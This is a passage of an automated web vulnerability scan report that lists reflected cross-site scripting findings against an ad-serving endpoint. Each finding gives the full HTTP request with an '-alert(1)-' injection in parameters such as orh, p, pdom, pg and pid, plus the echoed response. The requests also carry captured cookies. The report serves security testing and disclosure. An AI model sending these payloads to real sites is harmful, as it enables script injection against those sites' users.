Echoing user-controllable data within a script context is inherently dangerous and hard to make safe. Where possible, the application should not place user data in this context at all. Where it must, every character outside a strict alphanumeric allowlist should be escaped as \xHH (or \uHHHH) before the value is written into the quoted JavaScript string. HTML entity encoding does not help inside a script block, and escaping only the quote character a given string uses is not enough, since this report shows the same parameters reflected into both single- and double-quoted strings.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=9378a"-alert(1)-"c9b031313ac&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=9378a"-alert(1)-"c9b031313ac&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";
this.type =
...[SNIP]...

3.138. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [orh parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f0ad'-alert(1)-'2732c1fdd68 was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com8f0ad'-alert(1)-'2732c1fdd68&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
og.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com8f0ad'-alert(1)-'2732c1fdd68&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.139. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [orh parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce5d5"-alert(1)-"1bfb13a346d was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.comce5d5"-alert(1)-"1bfb13a346d&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
og.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.comce5d5"-alert(1)-"1bfb13a346d&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";

...[SNIP]...

3.140. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [p parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b324'-alert(1)-'1aa36b96c8d was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=22b324'-alert(1)-'1aa36b96c8d&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
3B0%3B61499020%3B4307-300/250%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=22b324'-alert(1)-'1aa36b96c8d&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&p
...[SNIP]...

3.141. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [p parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74e14"-alert(1)-"d476ec4b721 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=274e14"-alert(1)-"d476ec4b721&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
3B0%3B61499020%3B4307-300/250%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=274e14"-alert(1)-"d476ec4b721&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&p
...[SNIP]...

3.142. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pdom parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f831a"-alert(1)-"fd41ddc67fd was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.comf831a"-alert(1)-"fd41ddc67fd&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
0686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.comf831a"-alert(1)-"fd41ddc67fd&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";
this.type = type;
this.uniqueId =
...[SNIP]...

3.143. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pdom parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d8f4'-alert(1)-'4276b68460c was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com7d8f4'-alert(1)-'4276b68460c&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
0686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com7d8f4'-alert(1)-'4276b68460c&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.144. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cbc0"-alert(1)-"ba0ac0d227c was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY6cbc0"-alert(1)-"ba0ac0d227c&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
1&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY6cbc0"-alert(1)-"ba0ac0d227c&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";
this.type = type;
this.uniqueId = plcrInfo_1303848426617.uniqueId;
this.thirdPartyI
...[SNIP]...

3.145. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ec98'-alert(1)-'6c46995427c was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY6ec98'-alert(1)-'6c46995427c&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
1&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY6ec98'-alert(1)-'6c46995427c&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.146. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c129e'-alert(1)-'a18cc8e1ddf was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=c129e'-alert(1)-'a18cc8e1ddf&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54539

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
